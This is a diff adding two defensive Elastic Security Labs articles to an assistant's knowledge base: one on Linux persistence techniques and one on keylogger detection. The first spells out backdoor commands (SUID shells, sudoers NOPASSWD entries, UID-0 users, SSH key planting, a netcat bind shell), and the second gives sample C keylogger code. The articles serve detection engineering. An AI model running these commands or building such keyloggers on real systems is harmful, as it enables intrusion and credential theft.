+[Set Owner User ID (SUID)](https://man7.org/linux/man-pages/man2/setuid.2.html) and [Set Group ID (SGID)](https://man7.org/linux/man-pages/man2/setgid.2.html) are Unix file permissions allowing users to run executables with the executable’s owner or group permissions, respectively. When the SUID bit is set on an executable owned by the root user, any user running the executable gains root privileges. Similarly, when the SGID bit is set on an executable, it runs with the permissions of the group that owns the file. 
+
+Typical targets for SUID and SGID backdoors include common system binaries like `find`, `vim`, or `bash`, frequently available and widely used. [GTFOBins](https://gtfobins.github.io/#+suid) provides a list of common Unix binaries that can be exploited to obtain a root shell or unauthorized file reads. System administrators must be cautious when managing SUID and SGID binaries, as improperly configured permissions can lead to significant security vulnerabilities. 
+
+To exploit this, either a misconfigured SUID or SGID binary must be present on the system, or root-level privileges must be obtained to create a backdoor. Typical privilege escalation enumeration scripts enumerate the entire filesystem for the presence of these binaries using `find`. 
+
+SUID and SGID binaries are common on Linux and are available on the system by default. Generally, these cannot be exploited. An example of a misconfigured SUID binary looks like this:
+
+```
+find / -perm -4000 -type f -exec ls -la {} \;
+-rwsr-sr-x 1 root root 1396520 Mar 14 11:31 /bin/bash
+```
+
+The `/bin/bash` binary is not a default SUID binary and causes a security risk. An attacker could now run `/bin/bash -p` to run bash and keep the root privileges on execution. More information on this is available at [GTFOBins](https://gtfobins.github.io/gtfobins/bash/). Although MITRE defines this as privilege escalation/defense evasion, it can (as shown) be used for persistence as well. More information by MITRE on this technique is available at [T1548.001](https://attack.mitre.org/techniques/T1548/001/).
+
+### Persistence through T1548.001 - setuid and setgid
+
+This method requires root privileges, as it sets the SUID bit to a set of executables: 
+
+```
+sudo ./panix.sh --suid --default
+[+] SUID privilege granted to /usr/bin/find
+[+] SUID privilege granted to /usr/bin/dash
+[-] python is not present on the system.
+[+] SUID privilege granted to /usr/bin/python3                                                                                       
+```
+
+After setting SUID permissions to the binary, it can be executed in a manner that will allow the user to keep the root privileges:
+
+```
+
+/usr/bin/find . -exec /bin/sh -p \; -quit
+whoami
+root
+```
+
+Looking at the events this generates, we can see a discrepancy between the user ID and real user ID:
+
+![Events generated as a result of SUID/SGID persistence establishment](/assets/images/primer-on-persistence-mechanisms/image8.png "Events generated as a result of SUID/SGID persistence establishment")
+
+After executing PANIX with `sudo`, SUID permissions were granted to `/usr/bin/find`, `/usr/bin/dash`, and `/usr/bin/python3` using `chmod`. Subsequently, `/usr/bin/find` was utilized to run `/bin/sh` with privileged mode (`-p`) to obtain a root shell. Typically, the real user ID of a process matches the effective user ID. However, there are exceptions, such as when using `sudo`, `su`, or, as demonstrated here, a SUID binary, where the real user ID differs. Using our knowledge of GTFOBins and the execution chain, we can detect several indicators of SUID and SGID abuse.
+
+| Category | Coverage                           |
+|----------|------------------------------------|
+| Process  | [SUID/SGUID Enumeration Detected](https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_suid_sguid_enumeration.toml)    |
+|          | [Setuid / Setgid Bit Set via chmod](https://github.com/elastic/detection-rules/blob/main/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml)  |
+|          | [Privilege Escalation via SUID/SGID](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml) |
+
+### Hunting for T1548.001 - setuid and setgid
+
+The simplest and most effective way of hunting for SUID and SGID files is to search the filesystem for these files through OSQuery and take note of unusual ones. The [OSQuery SUID Hunting](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/privilege_escalation_via_suid_binaries.toml) rule can help you to hunt for this technique.
+
+## T1548.003 - abuse elevation control mechanism: sudo and sudo caching (sudoers file modification)
+
+The `sudo` command allows users to execute commands with superuser or other user privileges. The sudoers file manages [sudo permissions](https://linux.die.net/man/5/sudoers), which dictates who can use sudo and what commands they can run. The main configuration file is located at `/etc/sudoers`.
+
+This file contains global settings and user-specific rules for sudo access. Additionally, there is a directory used to store additional sudoers configuration files at `/etc/sudoers.d/`. Each file in this directory is treated as an extension of the main sudoers file, allowing for modular and organized sudo configurations. 
+
+Both system administrators and threat actors can misconfigure the sudoers file and its extensions. A common accidental misconfiguration might be overly permissive rules that grant users more access than necessary. Conversely, a threat actor with root access can deliberately modify these files to ensure they maintain elevated access.
+
+An example of a misconfiguration or backdoor that allows an attacker to run any command as any user without a password prompt looks like this:
+
+```
+Attacker ALL=(ALL) NOPASSWD:ALL
+```
+
+By exploiting such misconfigurations, an attacker can maintain persistent root access. For example, with the above backdoored configuration, the attacker can gain a root shell by executing `sudo /bin/bash`. Similarly to the previous technique, this technique is also classified as privilege escalation/defense evasion by MITRE. Of course, this is again true, but it is also a way of establishing persistence. More information on T1548.003 can be found [here](https://attack.mitre.org/techniques/T1548/003/).
+
+### Persistence through T1548.003 - sudoers file modification
+
+The `sudo -l` command can be used to list out the allowed (and forbidden) commands for the user on the current host. By default, a non-root user cannot run any commands using sudo without specifying a password. 
+
+```
+sudo -l
+[sudo] password for attacker:
+```
+
+Let’s add a backdoor entry for the `attacker` user:
+
+```
+sudo ./panix.sh --sudoers --username attacker
+[+] User attacker can now run all commands without a sudo password.
+```
+
+After adding a backdoor in the sudoers file and rerunning the `sudo -l` command, we see that the attacker can now run any command on the system with sudo without specifying a password.
+
+```
+> sudo -l
+> User attacker may run the following commands on ubuntu-persistence-research:
+>  (ALL : ALL) ALL
+>  (ALL) NOPASSWD: ALL 
+```
+
+After planting this backdoor, not much traces are left behind, other than the creation of the `/etc/sudoers.d/attacker` file.
+
+![Events generated as a result of sudoers file modification persistence establishment](/assets/images/primer-on-persistence-mechanisms/image6.png "Events generated as a result of sudoers file modification persistence establishment")
+
+This backdoor can also be established by adding to the `/etc/sudoers` file, which would not generate a file creation event. This event can be captured via FIM.
+
+| Category | Coverage                                                     |
+|----------|--------------------------------------------------------------|
+| File     | [Sudoers File Modification](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml)                                    |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)                  |
+| Process  | [Potential Privilege Escalation via Sudoers File Modification](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml) |
+
+### Hunting for T1548.003 - sudoers file modification
+
+OSQuery provides a module that displays all sudoers files and rules through a simple and effective live hunt, available at [Privilege Escalation Identification via Existing Sudoers File](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/privilege_escalation_via_existing_sudoers.toml).
+
+## T1098/T1136 - account manipulation/creation
+
+Persistence can be established through the creation or modification of user accounts. By manipulating user credentials or permissions, attackers can ensure long-term access to a compromised system. This section covers various methods of achieving persistence through user account manipulation. MITRE divides this section into [T1098](https://attack.mitre.org/techniques/T1098/) (account manipulation) and [T1136](https://attack.mitre.org/techniques/T1136/) (create account).
+
+### T1136.001 - create account: local account
+
+Creating a new user account is a straightforward way to establish persistence. An attacker with root privileges can add a new user, ensuring they maintain access to the system even if other backdoors are removed. For example:
+
+```
+useradd -m -s /bin/bash backdooruser
+echo 'backdooruser:password' | chpasswd
+```
+
+This creates a new user called `backdooruser` with a password of `password`.
+
+### T1098 - account manipulation: user credential modification
+
+Modifying the credentials of an existing user can also provide persistent access. This might involve changing the password of a privileged user account.
+
+```
+echo 'targetuser:newpassword' | chpasswd
+```
+
+This changes the password for `targetuser` to `newpassword`.
+
+### T1098 - account manipulation: direct /etc/passwd file modification
+
+Directly writing to the `/etc/passwd` file is another method for modifying user accounts. This approach allows attackers to manually add or modify user entries, potentially avoiding detection.
+
+```
+echo "malicioususer:<openssl-hash>:0:0:root:/root:/bin/bash" >> /etc/passwd
+```
+
+Where `<;openssl-hash>` is a hash that can be generated through `openssl passwd "$password".`
+
+The command above creates a new user `malicioususer`, adds them to the `sudo group`, and sets a password. Similarly, this attack can be performed on the `/etc/shadow` file, by replacing the hash for a user’s password with a known hash.
+
+### T1136.001 - create account: backdoor user creation
+
+A backdoor user is a user account created or modified specifically to maintain access to the system. This account often has elevated privileges and is intended to be difficult to detect. One method involves creating a user with a UID of 0, effectively making it a root-equivalent user. This approach is detailed in a blog post called [Backdoor users on Linux with uid=0](https://embracethered.com/blog/posts/2021/linux-user-uid-zero-backdoor/).
+
+```
+useradd -ou 0 -g 0 -m -d /root -s /bin/bash backdoorroot
+echo 'backdoorroot:password' | chpasswd
+```
+
+This creates a new user `backdoorroot` with UID 0, giving it root privileges.
+
+### T1098 - account manipulation: user added to privileged group
+
+Adding an existing user to a privileged group, such as the sudo group, can elevate their permissions, allowing them to execute commands with superuser privileges.
+
+```
+usermod -aG sudo existinguser
+```
+
+This adds `existinguser` to the sudo group.
+
+### Persistence through T1098/T1136 - account manipulation/creation
+
+All of these techniques are trivial to execute manually, but they are also built into PANIX in case you want to analyze the logs using a binary rather than a manual action. As the events generated by these techniques are not very interesting, we will not analyze them individually. We detect all the techniques described above through a vast set of detection rules.
+
+| Category | Coverage                                       |
+|----------|------------------------------------------------|
+| File     | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)    |
+|          | [Shadow File Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_user_password_change.toml)                       |
+| Process  | [Potential Linux Backdoor User Account Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_backdoor_user_creation.toml) |
+| IAM      | [Linux Group Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_group_creation.toml)                          |
+|          | [Linux User Added to Privileged Group](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_user_added_to_privileged_group.toml)          |
+|          | [Linux User Account Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_user_account_creation.toml)                    |
+|          | [User or Group Creation/Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_user_or_group_creation_or_modification.toml)            |
+
+### Hunting for T1098/T1136 - account manipulation/creation
+
+There are many ways to hunt for these techniques. The above detection rules can be added as a timelines query to look back at a longer duration of time, the `/var/log/auth.log` (and equivalents on other Linux distributions) can be parsed and read, and OSQuery can be leveraged to read user info from a running system. The [Privilege Escalation/Persistence via User/Group Creation and/or Modification](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_user_group_creation_modification.toml) hunt rule contains several OSQuery queries to hunt for these techniques.
+
+## T1098.004 - account manipulation: SSH
+
+[Secure Shell (SSH)](https://linux.die.net/man/1/ssh) is a protocol to securely access remote systems. It leverages public/private key pairs to authenticate users, providing a more secure alternative to password-based logins. The SSH keys consist of a private key, kept secure by the user, and a public key, shared with the remote system.
+
+The default locations for user-specific SSH key files and configuration files are as follows:
+
+* `~/.ssh/id_rsa`
+* `~/.ssh/id_rsa.pub`
+* `~/.ssh/authorized_keys`
+* `/root/.ssh/id_rsa`
+* `/root/.ssh/id_rsa.pub`
+* `/root/.ssh/authorized_keys`
+
+A system-wide configuration is present in:
+
+* `/etc/ssh/`
+
+The private key remains on the client machine, while the public key is copied to the remote server’s `authorized_keys` file. This setup allows the user to authenticate with the server without entering a password.
+
+SSH keys are used to authenticate remote login sessions via SSH and for services like Secure Copy Protocol (SCP) and Secure File Transfer Protocol (SFTP), which allow secure file transfers between machines.
+
+An attacker can establish persistence on a compromised host by adding their public key to the `authorized_keys` file of a user with sufficient privileges. This ensures they can regain access to the system even if the user changes their password. This persistence method is stealthy as built-in shell commands can be used, which are commonly more difficult to capture as a data source. Additionally, it does not rely on creating new user accounts or modifying system binaries.
+
+### Persistence through T1098.004 - SSH modification
+
+Similar to previously, PANIX can be used to establish persistence through SSH. It can also be tested by manually adding a new key to `~/.ssh/authorized_keys`, or by creating a new public/private key pair on the system. If you want to test these techniques, you can execute the following PANIX command to establish persistence by creating a new key:
+
+```
+./panix.sh --ssh-key --default
+SSH key generated:
+Private key: /home/user/.ssh/id_rsa18220
+Public key: /home/user/.ssh/id_rsa1822.pub
+[+] SSH key persistence established.
+```
+
+Use the following PANIX command to add a new public key to the authorized_keys file:
+
+```
+./panix.sh  --authorized-keys --default --key <key>
+[+] Persistence added to /home/user/.ssh/authorized_keys
+```
+
+For file modification events, we can leverage FIM. We have several detection rules covering this technique in place.
+
+| Category | Coverage                                    |
+|----------|---------------------------------------------|
+| File     | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |
+| Process  | [SSH Key Generated via ssh-keygen](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_ssh_key_generation.toml)            |
+
+A note on leveraging the “Potential Persistence via File Modification” rule: due to the limitation of leveraging wildcards in FIM, the FIM configuration should be adapted to represent your environment’s public/private key and authorized_keys file locations. MITRE provides additional information on this technique in [T1098.004](https://attack.mitre.org/techniques/T1098/004/).
+
+### Hunting for T1098.004 - SSH modification
+
+The main focuses while hunting for SSH persistence are newly added public/private keys, file changes related to the `authorized_keys` files, and configuration changes. We can leverage OSQuery to hunt for all three through the queries in the [Persistence via SSH Configurations and/or Keys](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_ssh_configurations_and_keys.toml) hunt.
+
+## T1059.004 - command and scripting interpreter: bind shells
+
+[A bind shell](https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/) is a remote access tool allowing an attacker to connect to a compromised system. Unlike reverse shells, which connect back to the attacker’s machine, a bind shell listens for incoming connections on the compromised host. This allows the attacker to connect at will, gaining command execution on the target machine.
+
+A bind shell typically involves the following steps:
+
+1. Listening Socket: The compromised system opens a network socket and listens for incoming connections on a specific port.
+2. Binding the Shell: When a connection is established, the system binds a command shell (such as `/bin/bash` or `/bin/sh`) to the socket.
+3. Remote Access: The attacker connects to the bind shell using a network client (like `netcat`) and gains access to the command shell on the compromised system.
+
+An attacker can set up a bind shell in various ways, ranging from simple one-liners to more sophisticated scripts. Here is an example of a bind shell using the traditional version of netcat:
+
+```
+nc -lvnp 9001 -e /bin/bash
+```
+
+Once the bind shell is set up, the attacker can connect to it from their machine:
+
+```
+nc -nv <target_ip> 4444
+```
+
+To maintain persistence, the bind shell must be set to start automatically upon system boot or reboot. This can be achieved through various methods we discussed earlier, such as `cron`, `Systemd,` or methods discussed in the next part of this Linux detection engineering series.
+
+MITRE does not have a specific bind/reverse-shell technique, and probably classifies bind shells as the execution technique. However, the bind shell is used for persistence in our use case. Some more information from MITRE on bind/reverse shells is available at [T1059.004](https://attack.mitre.org/techniques/T1059/004/).
+
+### Persistence through T1059.004 - bind shells
+
+Detecting bind shells through behavioral rules is inherently challenging because their behavior is typically benign and indistinguishable from legitimate processes. A bind shell opens a network socket and waits for an incoming connection, a common activity for many legitimate services. When an attacker connects, it merely results in a network connection and the initiation of a shell session, which are both normal operations on a system.
+
+Due to behavioral detection's limitations, the most reliable method for identifying bind shells is static signature detection. This approach involves scanning the file system or memory for known shellcode patterns associated with bind shells.
+
+By leveraging static signatures, we can identify and prevent bind shells more effectively than relying solely on behavioral analysis. This approach helps detect the specific code sequences used by bind shells, regardless of their behavior, ensuring a more robust defense against this type of persistence mechanism.
+
+As all of our signature-based detections are open-source, you can check them out by visiting our [protections-artifacts YARA repository](https://github.com/elastic/protections-artifacts/tree/main/yara/rules). If you want to analyze this method within your tooling, you can leverage PANIX to set up a bind shell and connect to it using `nc`. To do so, execute the following command:
+
+```
+./panix.sh --bind-shell --default --architecture x64
+[+] Bind shell /tmp/bd64 was created, executed and backgrounded.
+[+] The bind shell is listening on port 9001.
+[+] To interact with it from a different system, use: nc -nv <IP> 9001
+[+] Bind shell persistence established!
+```
+
+### Hunting for T1059.004 - bind shells
+
+Although writing solid behavioral detection rules that do not provide false positives on a regular basis is near impossible, hunting for them is not. Based on the behavior of a bind shell, we know that we can look for long running processes, listening ports and listening sockets. To do so, we can leverage OSQuery. Several hunts are available for this scenario within the [Persistence Through Reverse/Bind Shells](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_reverse_bind_shells.toml) hunting rule.
+
+## T1059.004 - command and scripting interpreter: reverse shells
+
+Reverse shells are utilized in many of the persistence techniques discussed in this article and will be further explored in upcoming parts. While specific rules for detecting reverse shells were not added to many of the techniques above, they are very relevant. To maintain consistency and ensure comprehensive coverage, the following detection and endpoint rules are included to capture these persistence mechanisms.
+
+| Category | Coverage                                   |
+|----------|--------------------------------------------|
+| Process  | [Suspicious Execution via setsid and nohup](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_suspicious_execution_via_setsid_and_nohup.toml)  |
+|          | [Suspicious Execution via a Hidden Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_suspicious_execution_via_a_hidden_process.toml)  |
+| Network  | [Linux Reverse Shell](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell.toml)                        |
+|          | [Linux Reverse Shell via Child](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell_via_child.toml)              |
+|          | [Linux Reverse Shell via Netcat](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell_via_netcat.toml)             |
+|          | [Linux Reverse Shell via Suspicious Utility](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell_via_suspicious_utility.toml) |
+|          | [Linux Reverse Shell via setsid and nohup](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_reverse_shell_via_setsid_and_nohup.toml)   |
+|          | [Potential Meterpreter Reverse Shell](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_meterpreter_linux.toml)        |
+|          | [Potential Reverse Shell via UDP](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_udp_cli_utility_linux.toml)            |
+
+## Conclusion
+
+In this part of the “Linux Detection Engineering” series, we looked into the basics of Linux persistence. If you missed the first part of the series, which focused on detection engineering with Auditd, you can catch up [here](https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd). This article explored various persistence techniques, including scheduled tasks, systemd services, shell profile modifications, XDG autostart configurations, SUID/SGID binaries, sudoers rules, user and group creations/modifications, SSH key, and authorized_key modifications, bind and reverse shells.
+
+Not only did the explanation cover how each persistence method operates, but it also provided practical demonstrations of configuring them using a straightforward tool called [PANIX](https://github.com/Aegrah/PANIX). This hands-on approach enabled you to test the coverage of these techniques using your preferred security product. Additionally, we discussed hunting strategies for each method, ranging from ES|QL aggregation queries to live hunt queries with OSQuery.
+
+We hope you found this format helpful. In the next article, we'll explore more advanced and lesser-known persistence methods used in the wild. Until then, happy hunting!
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/protecting_your_devices_from_information_theft_keylogger_protection.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/protecting_your_devices_from_information_theft_keylogger_protection.md
new file mode 100644
index 0000000000000..e95a7cc810637
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/protecting_your_devices_from_information_theft_keylogger_protection.md
@@ -0,0 +1,251 @@
+---
+title: "Protecting your devices from information theft"
+slug: "protecting-your-devices-from-information-theft-keylogger-protection"
+date: "2024-05-30"
+subtitle: "Keylogger detection using Windows API behaviors"
+description: "In this article, we will introduce the keylogger and keylogging detection features added this year to Elastic Defend (starting from version 8.12), which is responsible for endpoint protection in Elastic Security."
+author:
+- slug: asuka-nakajima
+image: "Security Labs Images 10.jpg"
+category:
+  - slug: security-operations
+  - slug: security-research
+  - slug: detection-science
+tags:
+  - detection engineering
+  - threat hunting
+  - threat detection
+---
+
+In this article, we will introduce the keylogger and keylogging detection features added this year to Elastic Defend (starting from [version 8.12](https://www.elastic.co/guide/en/security/8.12/release-notes-header-8.12.0.html#enhancements-8.12.0)), which is responsible for endpoint protection in Elastic Security. This article is also available in [Japanese](https://www.elastic.co/security-labs/protecting-your-devices-from-information-theft-keylogger-protection-jp).
+
+## Introduction
+
+Starting with Elastic Defend 8.12, we have enhanced the detection of keyloggers and malware with keylogging capabilities (such as information-stealing malware or remote access trojans, better known as RATs) on Windows by monitoring and recording the calls to representative Windows APIs used by keyloggers. This publication will focus on providing a detailed technical background of this new feature. Additionally, we will introduce the new prebuilt behavioral detection rules created in conjunction with this feature.
+
+### What is a keylogger and what are their risks?
+
+A keylogger is a type of software that monitors and records the keystrokes entered on a computer (※1). While keyloggers can be used for legitimate purposes such as user monitoring, they are frequently abused by malicious actors. Specifically, they are used to steal sensitive information such as authentication credentials, credit card details, and various confidential data entered through the keyboard. (※1: While there are hardware keyloggers that can be attached directly to a PC via USB, this article focuses on software keyloggers.)
+
+The sensitive information obtained through keyloggers can be exploited for monetary theft or as a stepping stone for further cyber attacks. Therefore, although keylogging itself does not directly damage the computer, early detection is crucial to preventing subsequent, more invasive cyber attacks.
+
+There are many types of malware with keylogging capabilities, particularly RATs, information stealers, and banking malware. Some well-known malware with keylogging functionality includes [Agent Tesla](https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla), [LokiBot](https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot), and [SnakeKeylogger](https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger).
+
+### How are keystrokes stolen?
+
+Next, let's explain from a technical perspective how keyloggers function without being detected. While keyloggers can be used within various operating system environments (Windows/Linux/macOS and mobile devices), this article will focus on Windows keyloggers. Specifically, we will describe four distinct types of keyloggers that capture keystrokes using Windows APIs and functions (※2).
+
+As a side note, the reason for explaining keylogging methods here is to deepen the understanding of the new detection features introduced in the latter half of this article. Therefore, the example code provided is for illustrative purposes only and is not intended to be executable as is (※3).
+
+(※2: Keyloggers running on Windows can be broadly divided into those installed in kernel space (OS side) and those installed in the same space as regular applications (user space). This article focuses on the latter type.)
+(※3: If a keylogger is created and misused based on the example code provided below, Elastic will not be responsible for any consequences.)
+
+ 1. Polling-based keylogger
+
+This type of keylogger polls or periodically checks the state of each key on the keyboard (whether the key is pressed) at short intervals (much shorter than one second). If a keylogger detects that a new key has been pressed since the last check, it records and saves the information of the pressed key. By repeating this process, the keylogger captures the characters entered by the user.
+
+Polling-based keyloggers are implemented using Windows APIs that check the state of key inputs, with the [```GetAsyncKeyState```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate) API being a representative example. This API can determine whether a specific key is currently pressed and whether that key has been pressed since the last API call. Below is a simple example of a polling-based keylogger using the ```GetAsyncKeyState``` API:
+
+``` c
+while(true)
+{
+    for (int key = 1; key <= 255; key++)
+    {
+        if (GetAsyncKeyState(key) & 0x01)
+        {
+            SaveTheKey(key, "log.txt");
+        }
+    }
+    Sleep(50);
+}
+```
+
+The method of polling (```GetAsyncKeyState```) to capture key press states is not only a well-known, classic keylogging technique, but it is also commonly used by malware today.
+
+ 2. Hooking-based keylogger
+ 
+Hooking-based keyloggers, like polling-based keyloggers, are a classic type that has been around for a long time. Let's first explain what a "hook" is.
+
+A hook is a mechanism that allows you to insert custom processing (custom code) into specific operations of an application. Using a hook to insert custom processing is known as "hooking."
+
+Windows provides a mechanism that allows you to hook messages (events) such as key inputs to an application, and this can be utilized through the [```SetWindowsHookEx```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexw) API. Below is a simple example of a hooking-based keylogger using the ```SetWindowsHookEx``` API:
+
+``` c
+HMODULE hHookLibrary = LoadLibraryW(L"hook.dll");
+FARPROC hookFunc = GetProcAddress(hHookLibrary, "SaveTheKey");
+
+HHOOK keyboardHook = NULL;
+    
+keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,
+                (HOOKPROC)hookFunc,
+                hHookLibrary,
+                0);
+```
+
+ 3. Keylogger using the Raw Input Model
+ 
+This type of keylogger captures and records raw input data obtained directly from input devices like keyboards. Before delving into the details of this type of keylogger, it's essential to understand the "Original Input Model" and "Raw Input Model" in Windows. Here's an explanation of each input method:
+
+ - **Original Input Model**: The data entered from input devices like keyboards is processed by the OS before being delivered to the application.
+ - **Raw Input Model**: The data entered from input devices is received directly by the application without any intermediate processing by the OS.
+ 
+Initially, Windows only used the Original Input Model. However, with the introduction of Windows XP, the Raw Input Model was added, likely due to the increasing diversity of input devices. In the Raw Input Model, the [```RegisterRawInputDevices```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerrawinputdevices) API is used to register the input devices from which you want to receive raw data directly. Subsequently, the [```GetRawInputData```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getrawinputdata) API is used to obtain the raw data.
+
+Below is a simple example of a keylogger using the Raw Input Model and these APIs:
+
+``` c
+LRESULT CALLBACK WndProc(HWND hWnd, UINT uMessage, WPARAM wParam, LPARAM lParam)
+{
+
+    UINT dwSize = 0;
+    RAWINPUT* buffer = NULL;
+
+    switch (uMessage)
+    {
+    case WM_CREATE:
+        RAWINPUTDEVICE rid;
+        rid.usUsagePage = 0x01;  // HID_USAGE_PAGE_GENERIC
+        rid.usUsage = 0x06;      // HID_USAGE_GENERIC_KEYBOARD
+        rid.dwFlags = RIDEV_NOLEGACY | RIDEV_INPUTSINK;
+        rid.hwndTarget = hWnd;
+        RegisterRawInputDevices(&rid, 1, sizeof(rid));
+        break;
+    case WM_INPUT:
+        GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER));
+
+        buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);
+
+        if (GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize, sizeof(RAWINPUTHEADER)))
+        {
+            if (buffer->header.dwType == RIM_TYPEKEYBOARD)
+            {
+                SaveTheKey(buffer, "log.txt");
+            }
+        }
+        HeapFree(GetProcessHeap(), 0, buffer);
+        break;
+    default:
+        return DefWindowProc(hWnd, uMessage, wParam, lParam);
+    }
+    return 0;
+}
+```
+
+In this example, ```RegisterRawInputDevices``` is used to register the input devices from which raw input data is to be received. Here, it is set to receive raw input data from the keyboard.
+
+ 4. Keylogger using ```DirectInput```
+ 
+Finally, let's discuss a keylogger that uses ```DirectInput```. In simple terms, this keylogger abuses the functionalities of Microsoft DirectX. DirectX is a collection of APIs (libraries) used for handling multimedia tasks such as games and videos.
+
+Since obtaining various inputs from users is essential in gaming, DirectX also provides APIs for processing user inputs. The APIs provided before DirectX version 8 are known as ```DirectInput```. Below is a simple example of a keylogger using related APIs. As a side note, when acquiring key states using ```DirectInput```, the ```RegisterRawInputDevices``` API is called in the background.
+
+``` c
+LPDIRECTINPUT8		lpDI = NULL;
+LPDIRECTINPUTDEVICE8	lpKeyboard = NULL;
+
+BYTE key[256];
+ZeroMemory(key, sizeof(key));
+
+DirectInput8Create(hInstance, DIRECTINPUT_VERSION, IID_IDirectInput8, (LPVOID*)&lpDI, NULL);
+lpDI->CreateDevice(GUID_SysKeyboard, &lpKeyboard, NULL);
+lpKeyboard->SetDataFormat(&c_dfDIKeyboard);
+lpKeyboard->SetCooperativeLevel(hwndMain, DISCL_FOREGROUND | DISCL_NONEXCLUSIVE | DISCL_NOWINKEY);
+
+while(true)
+{
+    HRESULT ret = lpKeyboard->GetDeviceState(sizeof(key), key);
+    if (FAILED(ret)) {
+        lpKeyboard->Acquire();
+        lpKeyboard->GetDeviceState(sizeof(key), key);
+    }
+  SaveTheKey(key, "log.txt");	
+    Sleep(50);
+}
+```
+
+## Detecting keyloggers by monitoring Windows API calls
+
+Elastic Defend uses Event Tracing for Windows (ETW ※4) to detect the aforementioned keylogger types. This is achieved by monitoring calls to related Windows APIs and logging particularly anomalous behavior. Below are the Windows APIs being monitored and the newly created keylogger detection rules associated with these APIs. (※4: In short, ETW is a mechanism provided by Microsoft for tracing and logging the execution of applications and system components in Windows, such as device drivers.)
+
+### Monitored Windows APIs:
+
+ - [GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)
+ - [SetWindowsHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexw)
+ - [RegisterRawInputDevice](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerrawinputdevices)
+
+### New keylogger endpoint detection rules:
+
+ - [GetAsyncKeyState API Call from Suspicious Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_suspicious_process.toml)
+ - [GetAsyncKeyState API Call from Unusual Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_unusual_process.toml)
+ - [Keystroke Input Capture via DirectInput](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_directinput.toml)
+ - [Keystroke Input Capture via RegisterRawInputDevices](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml)
+ - [Keystroke Messages Hooking via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_messages_hooking_via_setwindowshookex.toml)
+ - [Keystrokes Input Capture from a Managed Application](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_managed_application.toml)
+ - [Keystrokes Input Capture from a Suspicious Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_suspicious_module.toml)
+ - [Keystrokes Input Capture from Suspicious CallStack](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_suspicious_callstack.toml)
+ - [Keystrokes Input Capture from Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_unsigned_dll.toml)
